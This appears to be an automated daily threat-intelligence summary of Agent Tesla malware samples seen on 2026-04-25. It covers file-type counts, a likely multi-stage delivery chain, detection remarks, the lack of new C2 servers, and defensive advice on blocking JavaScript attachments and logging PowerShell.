Daily Summary
Agent Tesla activity surged to 66 new samples on 2026-04-25, a 23% increase over the 7-day average of 54. The rising trend continues, driven primarily by a sharp uptick in JavaScript-based loaders. This marks one of the higher single-day volumes observed this week, indicating renewed campaign intensity.
New Samples Detected
The 66 samples are dominated by .js files (25, or 38%), nearly double the count of .exe executables (19). PowerShell (.ps1) scripts account for 9 samples, with .bat (4), .rar (3), and a smattering of .tgz, .vbs, .img, .vbe, and .infected files. The shift toward script-based payloads (.js and .ps1 making up 52% of total) suggests actors are prioritizing fileless or easily obfuscated delivery mechanisms over direct executables.
Distribution Methods
The file type distribution points to a multi-stage infection chain. JavaScript files likely serve as initial droppers, downloading secondary payloads (PowerShell or .bat scripts) which then execute the final Agent Tesla .exe. The presence of archive files (.rar, .tgz) indicates some campaigns still use password-protected attachments to bypass email gateways. The single .img file may represent a disk image delivery method, possibly targeting users on macOS or as an alternative archive format.
Detection Rate
Widespread AV detection is likely against these samples given the high proportion of script-based loaders with established signatures. However, the .img and .vbe samples may evade detection on platforms lacking full disk image analysis or VBScript emulation. SOC analysts should watch for JavaScript files with heavy encoding or PowerShell commands that attempt to deobfuscate in memory to bypass static scanning.
C2 Infrastructure
No new C2 servers were identified today, all 66 IOCs consist solely of sample hashes and file information. The absence of new server data may indicate actors are reusing existing infrastructure or have rotated to domains not yet observed by the tracker. Active C2s from previous days remain the primary threat.
7-Day Trend
After 7 days averaging 54 samples, today’s 66-sample count represents a notable spike above the weekly baseline. Activity appears to be ramping up, possibly signaling the start of a new campaign push or automated distribution bot rise.
Security Analysis
A key observation is the use of .tgz (tar.gz) archives, representing 2 samples. This format is unusual for Agent Tesla and may indicate targeting of Unix-based monitoring systems or analysts who process such archives. The .vbe variant, a single sample, could be a custom obfuscation to bypass detection on older Windows systems. Defensive recommendation: Block execution of .js files from email attachments at the gateway; if this is not feasible, ensure PowerShell execution policy restricts script downloads and logs all PowerShell command activity for retrospective analysis.